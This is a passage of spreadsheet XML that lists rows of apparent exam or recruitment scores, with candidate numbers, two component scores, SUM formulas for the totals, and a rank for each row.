      <c r="D221" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E221" s="8" t="n">
        <v>44.8</v>
      </c>
      <c r="F221" s="8" t="n">
        <v>48.8</v>
      </c>
      <c r="G221" s="8"/>
      <c r="H221" s="8" t="n">
        <f aca="false">SUM(E221:G221)</f>
        <v>93.6</v>
      </c>
      <c r="I221" s="8" t="n">
        <v>18</v>
      </c>
    </row>
    <row r="222" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A222" s="8" t="n">
        <v>4200049</v>
      </c>
      <c r="B222" s="8" t="n">
        <v>1314010812</v>
      </c>
      <c r="C222" s="8" t="s">
        <v>121</v>
      </c>
      <c r="D222" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E222" s="8" t="n">
        <v>46.8</v>
      </c>
      <c r="F222" s="8" t="n">
        <v>46.4</v>
      </c>
      <c r="G222" s="8"/>
      <c r="H222" s="8" t="n">
        <f aca="false">SUM(E222:G222)</f>
        <v>93.2</v>
      </c>
      <c r="I222" s="8" t="n">
        <v>19</v>
      </c>
    </row>
    <row r="223" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A223" s="8" t="n">
        <v>4200049</v>
      </c>
      <c r="B223" s="8" t="n">
        <v>1314010805</v>
      </c>
      <c r="C223" s="8" t="s">
        <v>121</v>
      </c>
      <c r="D223" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E223" s="8" t="n">
        <v>43.4</v>
      </c>
      <c r="F223" s="8" t="n">
        <v>49.6</v>
      </c>
      <c r="G223" s="8"/>
      <c r="H223" s="8" t="n">
        <f aca="false">SUM(E223:G223)</f>
        <v>93</v>
      </c>
      <c r="I223" s="8" t="n">
        <v>20</v>
      </c>
    </row>
    <row r="224" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A224" s="8" t="n">
        <v>4200049</v>
      </c>
      <c r="B224" s="8" t="n">
        <v>1314010727</v>
      </c>
      <c r="C224" s="8" t="s">
        <v>121</v>
      </c>
      <c r="D224" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E224" s="8" t="n">
        <v>42.8</v>
      </c>
      <c r="F224" s="8" t="n">
        <v>49.8</v>
      </c>
      <c r="G224" s="8"/>
      <c r="H224" s="8" t="n">
        <f aca="false">SUM(E224:G224)</f>
        <v>92.6</v>
      </c>
      <c r="I224" s="8" t="n">
        <v>21</v>
      </c>
    </row>
    <row r="225" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A225" s="8" t="n">
        <v>4200049</v>
      </c>
      <c r="B225" s="8" t="n">
        <v>1314010802</v>
      </c>
      <c r="C225" s="8" t="s">
        <v>121</v>
      </c>
      <c r="D225" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E225" s="8" t="n">
        <v>44.4</v>
      </c>
      <c r="F225" s="8" t="n">
        <v>47.8</v>
      </c>
      <c r="G225" s="8"/>
      <c r="H225" s="8" t="n">
        <f aca="false">SUM(E225:G225)</f>
        <v>92.2</v>
      </c>
      <c r="I225" s="8" t="n">
        <v>22</v>
      </c>
    </row>
    <row r="226" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A226" s="8" t="n">
        <v>4200049</v>
      </c>
      <c r="B226" s="8" t="n">
        <v>1314010721</v>
      </c>
      <c r="C226" s="8" t="s">
        <v>121</v>
      </c>
      <c r="D226" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E226" s="8" t="n">
        <v>38</v>
      </c>
      <c r="F226" s="8" t="n">
        <v>50.6</v>
      </c>
      <c r="G226" s="8"/>
      <c r="H226" s="8" t="n">
        <f aca="false">SUM(E226:G226)</f>
        <v>88.6</v>
      </c>
      <c r="I226" s="8" t="n">
        <v>23</v>
      </c>
    </row>
    <row r="227" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A227" s="8" t="n">
        <v>4200049</v>
      </c>
      <c r="B227" s="8" t="n">
        <v>1314010803</v>
      </c>
      <c r="C227" s="8" t="s">
        <v>121</v>
      </c>
      <c r="D227" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E227" s="8" t="n">
        <v>43.4</v>
      </c>
      <c r="F227" s="8" t="n">
        <v>43</v>
      </c>
      <c r="G227" s="8"/>
      <c r="H227" s="8" t="n">
        <f aca="false">SUM(E227:G227)</f>
        <v>86.4</v>
      </c>
      <c r="I227" s="8" t="n">
        <v>24</v>
      </c>
    </row>
    <row r="228" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A228" s="8" t="n">
        <v>4200049</v>
      </c>
      <c r="B228" s="8" t="n">
        <v>1314010811</v>
      </c>
      <c r="C228" s="8" t="s">
        <v>121</v>
      </c>
      <c r="D228" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E228" s="8" t="n">
        <v>39.8</v>
      </c>
      <c r="F228" s="8" t="n">
        <v>45</v>
      </c>
      <c r="G228" s="8"/>
      <c r="H228" s="8" t="n">
        <f aca="false">SUM(E228:G228)</f>
        <v>84.8</v>
      </c>
      <c r="I228" s="8" t="n">
        <v>25</v>
      </c>
    </row>
    <row r="229" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A229" s="8" t="n">
        <v>4200049</v>
      </c>
      <c r="B229" s="8" t="n">
        <v>1314010813</v>
      </c>
      <c r="C229" s="8" t="s">
        <v>121</v>
      </c>
      <c r="D229" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E229" s="8" t="n">
        <v>52.8</v>
      </c>
      <c r="F229" s="8" t="n">
        <v>31.2</v>
      </c>
      <c r="G229" s="8"/>
      <c r="H229" s="8" t="n">
        <f aca="false">SUM(E229:G229)</f>
        <v>84</v>
      </c>
      <c r="I229" s="8" t="n">
        <v>26</v>
      </c>
    </row>
    <row r="230" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A230" s="8" t="n">
        <v>4200049</v>
      </c>
      <c r="B230" s="8" t="n">
        <v>1314010729</v>
      </c>
      <c r="C230" s="8" t="s">
        <v>121</v>
      </c>
      <c r="D230" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E230" s="8" t="n">
        <v>34.8</v>
      </c>
      <c r="F230" s="8" t="n">
        <v>45.2</v>
      </c>
      <c r="G230" s="8"/>
      <c r="H230" s="8" t="n">
        <f aca="false">SUM(E230:G230)</f>
        <v>80</v>
      </c>
      <c r="I230" s="8" t="n">
        <v>27</v>
      </c>
    </row>
    <row r="231" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A231" s="8" t="n">
        <v>4200049</v>
      </c>
      <c r="B231" s="8" t="n">
        <v>1314010809</v>
      </c>
      <c r="C231" s="8" t="s">
        <v>121</v>
      </c>
      <c r="D231" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E231" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F231" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G231" s="8"/>
      <c r="H231" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I231" s="8" t="n">
        <v>28</v>
      </c>
    </row>
    <row r="232" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A232" s="8" t="n">
        <v>4200050</v>
      </c>
      <c r="B232" s="8" t="n">
        <v>1314010826</v>
      </c>
      <c r="C232" s="8" t="s">
        <v>123</v>
      </c>
      <c r="D232" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E232" s="8" t="n">
        <v>56.4</v>
      </c>
      <c r="F232" s="8" t="n">
        <v>69.2</v>
      </c>
      <c r="G232" s="8"/>
      <c r="H232" s="8" t="n">
        <f aca="false">SUM(E232:G232)</f>
        <v>125.6</v>
      </c>
      <c r="I232" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="233" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A233" s="8" t="n">
        <v>4200050</v>
      </c>
      <c r="B233" s="8" t="n">
        <v>1314010819</v>
      </c>
      <c r="C233" s="8" t="s">
        <v>123</v>
      </c>
      <c r="D233" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E233" s="8" t="n">
        <v>53</v>
      </c>
      <c r="F233" s="8" t="n">
        <v>57.6</v>
      </c>
      <c r="G233" s="8"/>
      <c r="H233" s="8" t="n">
        <f aca="false">SUM(E233:G233)</f>
        <v>110.6</v>
      </c>
      <c r="I233" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="234" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A234" s="8" t="n">
        <v>4200050</v>
      </c>
      <c r="B234" s="8" t="n">
        <v>1314010822</v>
      </c>
      <c r="C234" s="8" t="s">
        <v>123</v>
      </c>
      <c r="D234" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E234" s="8" t="n">
        <v>47</v>
      </c>
      <c r="F234" s="8" t="n">
        <v>61.6</v>
      </c>
      <c r="G234" s="8"/>
      <c r="H234" s="8" t="n">
        <f aca="false">SUM(E234:G234)</f>
        <v>108.6</v>
      </c>
      <c r="I234" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="235" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A235" s="8" t="n">
        <v>4200050</v>
      </c>
      <c r="B235" s="8" t="n">
        <v>1314010821</v>
      </c>
      <c r="C235" s="8" t="s">
        <v>123</v>
      </c>
      <c r="D235" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E235" s="8" t="n">
        <v>55.8</v>
      </c>
      <c r="F235" s="8" t="n">
        <v>50</v>
      </c>
      <c r="G235" s="8"/>
      <c r="H235" s="8" t="n">
        <f aca="false">SUM(E235:G235)</f>
        <v>105.8</v>
      </c>
      <c r="I235" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="236" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A236" s="8" t="n">
        <v>4200050</v>
      </c>
      <c r="B236" s="8" t="n">
        <v>1314010817</v>
      </c>
      <c r="C236" s="8" t="s">
        <v>123</v>
      </c>
      <c r="D236" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E236" s="8" t="n">
        <v>46.4</v>
      </c>
      <c r="F236" s="8" t="n">
        <v>53</v>
      </c>
      <c r="G236" s="8"/>
      <c r="H236" s="8" t="n">
        <f aca="false">SUM(E236:G236)</f>
        <v>99.4</v>
      </c>
      <c r="I236" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="237" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A237" s="8" t="n">
        <v>4200050</v>
      </c>
      <c r="B237" s="8" t="n">
        <v>1314010818</v>
      </c>
      <c r="C237" s="8" t="s">
        <v>123</v>
      </c>
      <c r="D237" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E237" s="8" t="n">
        <v>38.6</v>
      </c>
      <c r="F237" s="8" t="n">
        <v>57</v>
      </c>
      <c r="G237" s="8"/>
      <c r="H237" s="8" t="n">
        <f aca="false">SUM(E237:G237)</f>
        <v>95.6</v>
      </c>
      <c r="I237" s="8" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="238" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A238" s="8" t="n">
        <v>4200050</v>
      </c>
      <c r="B238" s="8" t="n">
        <v>1314010815</v>
      </c>
      <c r="C238" s="8" t="s">
        <v>123</v>
      </c>
      <c r="D238" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E238" s="8" t="n">
        <v>44.6</v>
      </c>
      <c r="F238" s="8" t="n">
        <v>50.6</v>
      </c>
      <c r="G238" s="8"/>
      <c r="H238" s="8" t="n">
        <f aca="false">SUM(E238:G238)</f>
        <v>95.2</v>
      </c>
      <c r="I238" s="8" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="239" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A239" s="8" t="n">
        <v>4200050</v>
      </c>
      <c r="B239" s="8" t="n">
        <v>1314010825</v>
      </c>
      <c r="C239" s="8" t="s">
        <v>123</v>
      </c>
      <c r="D239" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E239" s="8" t="n">
        <v>41</v>
      </c>
      <c r="F239" s="8" t="n">
        <v>50.2</v>
      </c>
      <c r="G239" s="8"/>
      <c r="H239" s="8" t="n">
        <f aca="false">SUM(E239:G239)</f>
        <v>91.2</v>
      </c>
      <c r="I239" s="8" t="n">
        <v>8</v>
      </c>
    </row>
    <row r="240" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A240" s="8" t="n">
        <v>4200050</v>
      </c>
      <c r="B240" s="8" t="n">
        <v>1314010823</v>
      </c>
      <c r="C240" s="8" t="s">
        <v>123</v>
      </c>
      <c r="D240" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E240" s="8" t="n">
        <v>36</v>
      </c>
      <c r="F240" s="8" t="n">
        <v>52.8</v>
      </c>
      <c r="G240" s="8"/>
      <c r="H240" s="8" t="n">
        <f aca="false">SUM(E240:G240)</f>
        <v>88.8</v>
      </c>
      <c r="I240" s="8" t="n">
        <v>9</v>
      </c>
    </row>
    <row r="241" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A241" s="8" t="n">
        <v>4200050</v>
      </c>
      <c r="B241" s="8" t="n">
        <v>1314010824</v>
      </c>
      <c r="C241" s="8" t="s">
        <v>123</v>
      </c>
      <c r="D241" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E241" s="8" t="n">
        <v>44.8</v>
      </c>
      <c r="F241" s="8" t="n">
        <v>44</v>
      </c>
      <c r="G241" s="8"/>
      <c r="H241" s="8" t="n">
        <f aca="false">SUM(E241:G241)</f>
        <v>88.8</v>
      </c>
      <c r="I241" s="8" t="n">
        <v>9</v>
      </c>
    </row>
    <row r="242" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A242" s="8" t="n">
        <v>4200050</v>
      </c>
      <c r="B242" s="8" t="n">
        <v>1314010820</v>
      </c>
      <c r="C242" s="8" t="s">
        <v>123</v>
      </c>
      <c r="D242" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E242" s="8" t="n">
        <v>45.4</v>
      </c>
      <c r="F242" s="8" t="n">
        <v>41.8</v>
      </c>
      <c r="G242" s="8"/>
      <c r="H242" s="8" t="n">
        <f aca="false">SUM(E242:G242)</f>
        <v>87.2</v>
      </c>
      <c r="I242" s="8" t="n">
        <v>11</v>
      </c>
    </row>
    <row r="243" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A243" s="8" t="n">
        <v>4200050</v>
      </c>
      <c r="B243" s="8" t="n">
        <v>1314010816</v>
      </c>
      <c r="C243" s="8" t="s">
        <v>123</v>
      </c>
      <c r="D243" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E243" s="8" t="n">
        <v>39.8</v>
      </c>
      <c r="F243" s="8" t="n">
        <v>43.6</v>
      </c>
      <c r="G243" s="8"/>
      <c r="H243" s="8" t="n">
        <f aca="false">SUM(E243:G243)</f>
        <v>83.4</v>
      </c>
      <c r="I243" s="8" t="n">
        <v>12</v>
      </c>
    </row>
    <row r="244" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A244" s="8" t="n">
        <v>4200050</v>
      </c>
      <c r="B244" s="8" t="n">
        <v>1314010827</v>
      </c>
      <c r="C244" s="8" t="s">
        <v>123</v>
      </c>
      <c r="D244" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E244" s="8" t="n">
        <v>34.2</v>
      </c>
      <c r="F244" s="8" t="n">
        <v>48.4</v>
      </c>
      <c r="G244" s="8"/>
      <c r="H244" s="8" t="n">
        <f aca="false">SUM(E244:G244)</f>
        <v>82.6</v>
      </c>
      <c r="I244" s="8" t="n">
        <v>13</v>
      </c>
    </row>
    <row r="245" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A245" s="8" t="n">
        <v>4200050</v>
      </c>
      <c r="B245" s="8" t="n">
        <v>1314010814</v>
      </c>
      <c r="C245" s="8" t="s">
        <v>123</v>
      </c>
      <c r="D245" s="8" t="s">
        <v>122</v>
      </c>
      <c r="E245" s="8" t="n">
        <v>32.2</v>
      </c>
      <c r="F245" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G245" s="8"/>
      <c r="H245" s="8" t="n">
        <v>32.2</v>
      </c>
      <c r="I245" s="8" t="n">
        <v>14</v>
      </c>
    </row>
    <row r="246" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A246" s="8" t="n">
        <v>4200051</v>
      </c>
      <c r="B246" s="8" t="n">
        <v>1314010828</v>
      </c>
      <c r="C246" s="8" t="s">
        <v>123</v>
      </c>
      <c r="D246" s="8" t="s">
        <v>124</v>
      </c>
      <c r="E246" s="8" t="n">
        <v>52</v>
      </c>
      <c r="F246" s="8" t="n">
        <v>75.4</v>
      </c>
      <c r="G246" s="8"/>
      <c r="H246" s="8" t="n">
        <f aca="false">SUM(E246:G246)</f>
        <v>127.4</v>
      </c>
      <c r="I246" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="247" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A247" s="8" t="n">
        <v>4200051</v>
      </c>
      <c r="B247" s="8" t="n">
        <v>1314010829</v>
      </c>
      <c r="C247" s="8" t="s">
        <v>123</v>
      </c>
      <c r="D247" s="8" t="s">
        <v>124</v>
      </c>
      <c r="E247" s="8" t="n">
        <v>51</v>
      </c>
      <c r="F247" s="8" t="n">
        <v>69.6</v>
      </c>
      <c r="G247" s="8"/>
      <c r="H247" s="8" t="n">
        <f aca="false">SUM(E247:G247)</f>
        <v>120.6</v>
      </c>
      <c r="I247" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="248" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A248" s="8" t="n">
        <v>4200051</v>
      </c>
      <c r="B248" s="8" t="n">
        <v>1314010901</v>
      </c>
      <c r="C248" s="8" t="s">
        <v>123</v>
      </c>
      <c r="D248" s="8" t="s">
        <v>124</v>
      </c>
      <c r="E248" s="8" t="n">
        <v>51.6</v>
      </c>
      <c r="F248" s="8" t="n">
        <v>63</v>
      </c>
      <c r="G248" s="8"/>
      <c r="H248" s="8" t="n">
        <f aca="false">SUM(E248:G248)</f>
        <v>114.6</v>
      </c>
      <c r="I248" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="249" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A249" s="8" t="n">
        <v>4200051</v>
      </c>
      <c r="B249" s="8" t="n">
        <v>1314010830</v>
      </c>
      <c r="C249" s="8" t="s">
        <v>123</v>
      </c>
      <c r="D249" s="8" t="s">
        <v>124</v>
      </c>
      <c r="E249" s="8" t="n">
        <v>53.6</v>
      </c>
      <c r="F249" s="8" t="n">
        <v>56.8</v>
      </c>
      <c r="G249" s="8"/>
      <c r="H249" s="8" t="n">
        <f aca="false">SUM(E249:G249)</f>
        <v>110.4</v>
      </c>
      <c r="I249" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="250" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A250" s="8" t="n">
        <v>4200051</v>
      </c>
      <c r="B250" s="8" t="n">
        <v>1314010902</v>
      </c>
      <c r="C250" s="8" t="s">
        <v>123</v>
      </c>
      <c r="D250" s="8" t="s">
        <v>124</v>
      </c>
      <c r="E250" s="8" t="n">
        <v>47</v>
      </c>
      <c r="F250" s="8" t="n">
        <v>61</v>
      </c>
      <c r="G250" s="8"/>
      <c r="H250" s="8" t="n">
        <f aca="false">SUM(E250:G250)</f>
        <v>108</v>
      </c>
      <c r="I250" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="251" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A251" s="8" t="n">
        <v>4200053</v>
      </c>
      <c r="B251" s="8" t="n">
        <v>1314010907</v>
      </c>
      <c r="C251" s="8" t="s">
        <v>123</v>
      </c>
      <c r="D251" s="8" t="s">
        <v>125</v>
      </c>
      <c r="E251" s="8" t="n">
        <v>71.2</v>
      </c>
      <c r="F251" s="8" t="n">
        <v>71.6</v>
      </c>
      <c r="G251" s="8"/>
      <c r="H251" s="8" t="n">
        <f aca="false">SUM(E251:G251)</f>
        <v>142.8</v>
      </c>
      <c r="I251" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="252" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A252" s="8" t="n">
        <v>4200053</v>
      </c>
      <c r="B252" s="8" t="n">
        <v>1314010906</v>
      </c>
      <c r="C252" s="8" t="s">
        <v>123</v>
      </c>
      <c r="D252" s="8" t="s">
        <v>125</v>
      </c>
      <c r="E252" s="8" t="n">
        <v>66.6</v>
      </c>
      <c r="F252" s="8" t="n">
        <v>73</v>
      </c>
      <c r="G252" s="8"/>
      <c r="H252" s="8" t="n">
        <f aca="false">SUM(E252:G252)</f>
        <v>139.6</v>
      </c>
      <c r="I252" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="253" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A253" s="8" t="n">
        <v>4200053</v>
      </c>
      <c r="B253" s="8" t="n">
        <v>1314010911</v>
      </c>
      <c r="C253" s="8" t="s">
        <v>123</v>
      </c>
      <c r="D253" s="8" t="s">
        <v>125</v>
      </c>
      <c r="E253" s="8" t="n">
        <v>62.6</v>
      </c>
      <c r="F253" s="8" t="n">
        <v>67.2</v>
      </c>
      <c r="G253" s="8"/>
      <c r="H253" s="8" t="n">
        <f aca="false">SUM(E253:G253)</f>
        <v>129.8</v>
      </c>
      <c r="I253" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="254" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A254" s="8" t="n">
        <v>4200053</v>
      </c>
      <c r="B254" s="8" t="n">
        <v>1314010904</v>
      </c>
      <c r="C254" s="8" t="s">
        <v>123</v>
      </c>
      <c r="D254" s="8" t="s">
        <v>125</v>
      </c>
      <c r="E254" s="8" t="n">
        <v>56.4</v>
      </c>
      <c r="F254" s="8" t="n">
        <v>66.6</v>
      </c>
      <c r="G254" s="8"/>
      <c r="H254" s="8" t="n">
        <f aca="false">SUM(E254:G254)</f>
        <v>123</v>
      </c>
      <c r="I254" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="255" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A255" s="8" t="n">
        <v>4200053</v>
      </c>
      <c r="B255" s="8" t="n">
        <v>1314010905</v>
      </c>
      <c r="C255" s="8" t="s">
        <v>123</v>
      </c>
      <c r="D255" s="8" t="s">
        <v>125</v>
      </c>
      <c r="E255" s="8" t="n">
        <v>51.2</v>
      </c>
      <c r="F255" s="8" t="n">
        <v>67.8</v>
      </c>
      <c r="G255" s="8"/>
      <c r="H255" s="8" t="n">
        <f aca="false">SUM(E255:G255)</f>
        <v>119</v>
      </c>
      <c r="I255" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="256" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A256" s="8" t="n">
        <v>4200053</v>
      </c>
      <c r="B256" s="8" t="n">
        <v>1314010908</v>
      </c>
      <c r="C256" s="8" t="s">
        <v>123</v>
      </c>
      <c r="D256" s="8" t="s">
        <v>125</v>
      </c>
      <c r="E256" s="8" t="n">
        <v>63</v>
      </c>
      <c r="F256" s="8" t="n">
        <v>54.6</v>
      </c>
      <c r="G256" s="8"/>
      <c r="H256" s="8" t="n">
        <f aca="false">SUM(E256:G256)</f>
        <v>117.6</v>
      </c>
      <c r="I256" s="8" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="257" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A257" s="8" t="n">
        <v>4200053</v>
      </c>
      <c r="B257" s="8" t="n">
        <v>1314010909</v>
      </c>
      <c r="C257" s="8" t="s">
        <v>123</v>
      </c>
      <c r="D257" s="8" t="s">
        <v>125</v>
      </c>
      <c r="E257" s="8" t="n">
        <v>56.4</v>
      </c>
      <c r="F257" s="8" t="n">
        <v>60.4</v>
      </c>
      <c r="G257" s="8"/>
      <c r="H257" s="8" t="n">
        <f aca="false">SUM(E257:G257)</f>
        <v>116.8</v>
      </c>
      <c r="I257" s="8" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="258" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A258" s="8" t="n">
        <v>4200053</v>
      </c>
      <c r="B258" s="8" t="n">
        <v>1314010903</v>
      </c>
      <c r="C258" s="8" t="s">
        <v>123</v>
      </c>
      <c r="D258" s="8" t="s">
        <v>125</v>
      </c>
      <c r="E258" s="8" t="n">
        <v>54</v>
      </c>
      <c r="F258" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G258" s="8"/>
      <c r="H258" s="8" t="n">
        <v>54</v>
      </c>
      <c r="I258" s="8" t="n">
        <v>8</v>
      </c>
    </row>
    <row r="259" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A259" s="8" t="n">
        <v>4200053</v>
      </c>
      <c r="B259" s="8" t="n">
        <v>1314010910</v>
      </c>
      <c r="C259" s="8" t="s">
        <v>123</v>
      </c>
      <c r="D259" s="8" t="s">
        <v>125</v>
      </c>
      <c r="E259" s="8" t="n">
        <v>60.4</v>
      </c>
      <c r="F259" s="8" t="n">
        <v>70</v>
      </c>
      <c r="G259" s="8"/>
      <c r="H259" s="8" t="n">
        <v>-2</v>
      </c>
      <c r="I259" s="8" t="n">
        <v>9</v>
      </c>
    </row>
    <row r="260" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A260" s="8" t="n">
        <v>4200054</v>
      </c>
      <c r="B260" s="8" t="n">
        <v>1314010914</v>
      </c>
      <c r="C260" s="8" t="s">
        <v>126</v>
      </c>
      <c r="D260" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E260" s="8" t="n">
        <v>59.4</v>
      </c>
      <c r="F260" s="8" t="n">
        <v>72.8</v>
      </c>
      <c r="G260" s="8"/>
      <c r="H260" s="8" t="n">
        <f aca="false">SUM(E260:G260)</f>
        <v>132.2</v>
      </c>
      <c r="I260" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="261" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A261" s="8" t="n">
        <v>4200054</v>
      </c>
      <c r="B261" s="8" t="n">
        <v>1314010912</v>
      </c>
      <c r="C261" s="8" t="s">
        <v>126</v>
      </c>
      <c r="D261" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E261" s="8" t="n">
        <v>53.2</v>
      </c>
      <c r="F261" s="8" t="n">
        <v>66.2</v>
      </c>
      <c r="G261" s="8"/>
      <c r="H261" s="8" t="n">
        <f aca="false">SUM(E261:G261)</f>
        <v>119.4</v>
      </c>
      <c r="I261" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="262" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A262" s="8" t="n">
        <v>4200054</v>
      </c>
      <c r="B262" s="8" t="n">
        <v>1314010913</v>
      </c>
      <c r="C262" s="8" t="s">
        <v>126</v>
      </c>
      <c r="D262" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E262" s="8" t="n">
        <v>41.4</v>
      </c>
      <c r="F262" s="8" t="n">
        <v>61.2</v>
      </c>
      <c r="G262" s="8"/>
      <c r="H262" s="8" t="n">
        <f aca="false">SUM(E262:G262)</f>
        <v>102.6</v>
      </c>
      <c r="I262" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="263" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A263" s="8" t="n">
        <v>4200055</v>
      </c>
      <c r="B263" s="8" t="n">
        <v>1314010916</v>
      </c>
      <c r="C263" s="8" t="s">
        <v>128</v>
      </c>
      <c r="D263" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E263" s="8" t="n">
        <v>52.6</v>
      </c>
      <c r="F263" s="8" t="n">
        <v>59.2</v>
      </c>
      <c r="G263" s="8"/>
      <c r="H263" s="8" t="n">
        <f aca="false">SUM(E263:G263)</f>
        <v>111.8</v>
      </c>
      <c r="I263" s="8" t="n">
        <v>1</v>
